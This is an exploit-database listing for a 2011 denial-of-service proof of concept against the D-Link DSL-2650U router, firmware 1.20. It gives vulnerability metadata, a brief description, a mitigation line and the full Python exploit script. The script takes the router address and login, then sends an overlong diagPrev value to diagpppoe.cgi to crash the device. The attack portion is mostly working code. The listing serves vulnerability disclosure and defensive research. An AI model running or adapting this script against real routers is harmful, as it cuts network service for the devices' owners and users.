header-logo
Suggest Exploit
vendor:
DSL-2650U
by:
Li'el Fridman
5.5
CVSS
MEDIUM
Denial of Service (DoS)
399
CWE
Product Name: DSL-2650U
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: NO
Related CWE:
CPE: o:dlink:dsl-2650u_firmware:1.20
Metasploit:
Other Scripts:
Platforms Tested: Linux
2011

Dlink DSL-2650U DoS/PoC

This exploit allows an attacker to perform a Denial of Service attack on the Dlink DSL-2650U router. By sending a specially crafted request to the 'diagpppoe.cgi' script with a long string of characters, the router crashes and becomes unresponsive.

Mitigation:

Upgrade to a patched firmware version or use a different router model.
Source

Exploit-DB raw data:

# Exploit Title: Dlink DSL-2650U DoS/PoC
# Date: July 6th, 2011
# Author: Li'el Fridman
# Software Link:
ftp://ftp.dlink.ru/pub/ADSL/DSL-2650U_BRU_D/Firmware/RU_1.20/DSL-2650U_BRU_D1_RU_1.20_06222011.zip
# Version: 1.20
# Tested on: Default firmware - Linux 2.6.8.1

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import sys
import os
import urllib

ip = raw_input('Please enter the router address: ')
username = raw_input('Please enter the router user name: ')
password = raw_input('Please enter the router password: ')
path = 'http://{0}:{1}@{2}/diagpppoe.cgi?diagPrev=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.format(username, password, ip)
print 'Trying {0}'.format(path)
opener = urllib.urlopen(path)
print 'Owned!'